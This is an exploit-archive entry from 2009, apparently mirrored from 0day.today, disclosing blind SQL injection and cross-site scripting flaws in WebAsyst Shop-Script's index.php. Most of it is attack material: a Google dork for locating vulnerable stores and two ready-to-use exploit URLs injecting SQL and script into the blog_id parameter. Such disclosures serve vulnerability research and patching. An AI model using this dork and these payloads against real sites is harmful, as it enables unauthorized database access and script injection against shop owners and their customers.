id: 5463
date: 07/08/2009
title: WebAsyst Shop-Script (bSQL/XSS) Multiple Remote Vulnerabilities
author: Vrs-hCk
cves: 

===============================================================
WebAsyst Shop-Script (bSQL/XSS) Multiple Remote Vulnerabilities
===============================================================


 =============================================================================================

 Title    : (Blind SQL/XSS) Multiple Remote Vulnerabilities
 Software : WebAsyst Shop-Script
 Vendor   : http://www.webasyst.net
 
 Date     : 03 July 2009 (Indonesia)
 Author   : Vrs-hCk

 =============================================================================================

 [-] Google Dork

     "Powered by WebAsyst Shop-Script"

 [-] Vulnerable (Blind SQL/XSS)

     index.php

 [-] Exploit (Blind SQL)

     http://[site]/[path]/index.php?ukey=news&blog_id=null and substring(@@version,1,1)=null

 [-] Exploit (XSS)

     http://[site]/[path]/index.php?ukey=news&blog_id=<script>alert(123)</script>

 =============================================================================================




#  0day.today [2023-03-24]  #